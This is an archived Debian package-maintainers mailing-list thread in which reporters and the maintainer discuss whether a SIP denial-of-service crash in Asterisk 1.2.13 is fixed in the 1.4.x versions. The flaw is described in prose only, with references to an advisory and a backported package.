Bug#435521: closed by Mark Purcell <msp at debian.org> (Re: Bug#435521: Asterisk SIP DOS Vulnerability)
msp at debian.org
Mon Aug 6 20:21:01 UTC 2007
Per the advisory I believe this issue is resolved in asterisk 1.4.x
debian unstable currently has version 1.4.9 so the bug should be resolved.
We have a backported version of 1.4.9 available from http://buildserver.net/
On Mon, 6 Aug 2007, you wrote:
> I have installed asterisk version 1:1.2.13~dfsg-2 (
> http://packages.debian.org/stable/comm/asterisk) and the problem seems to
> remain, asterisk crashes when receives a REGISTER packet with no Request-URI
> and no SIP-Version.
> Massimiliano Toce
> 2007/8/3, Debian Bug Tracking System <owner at bugs.debian.org>:
> > This is an automatic notification regarding your Bug report
> > #435521: Asterisk SIP DOS Vulnerability,
> > which was filed against the asterisk package.
> > It has been closed by Mark Purcell < msp at debian.org>.
> > Their explanation is attached below. If this explanation is
> > unsatisfactory and you have not received a better one in a separate
> > message then please contact Mark Purcell < msp at debian.org> by replying
> > to this email.
> > Debian bug tracking system administrator
> > (administrator, Debian Bugs database)
> > ---------- Messaggio inoltrato ----------
> > From: Mark Purcell < msp at debian.org>
> > To: Massimiliano Toce <massimiliano.toce at gmail.com>, 435521-done at bugs.debian.org
> > Date: Fri, 3 Aug 2007 17:48:16 +0100
> > Subject: Re: Bug#435521: Asterisk SIP DOS Vulnerability
> > Version: 1:1.4.2~dfsg-1
> > The advisory stated this issue is resolved in version 1.4.1 and later.
> > It would be useful if you could confirm using S.T.R.E.S.S that the
> > version in debian unstable does indeed have this issue resolved.
> > Mark
> > On Wed, 1 Aug 2007, Massimiliano Toce wrote:
> > > Package: asterisk
> > > Version: 1:1.2.13~dfsg-2
> > > Severity: critical
> > > Tags: security
> > >
> > > Asterisk crashes when handles a REGISTER message with no URI and no
> > > SIP-Version. See http://labs.musecurity.com/advisories/MU-200703-01.txt
> > for
> > > more details.
> > >
> > > We found it using S.T.R.E.S.S.: a software for security testing
> > > (http://lart.det.unifi.it/Members/rosi/stress
> > > ). We are using Debian GNU/Linux 4.0, kernel 2.6.18-4-686.
> > >
> > > regards,
> > > Massimiliano Toce, Leonardo Maccari, Matteo Rosi
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Size: 189 bytes
Desc: This is a digitally signed message part.
Url : http://lists.alioth.debian.org/pipermail/pkg-voip-maintainers/attachments/20070806/95bb71f4/attachment-0001.pgp
More information about the Pkg-voip-maintainers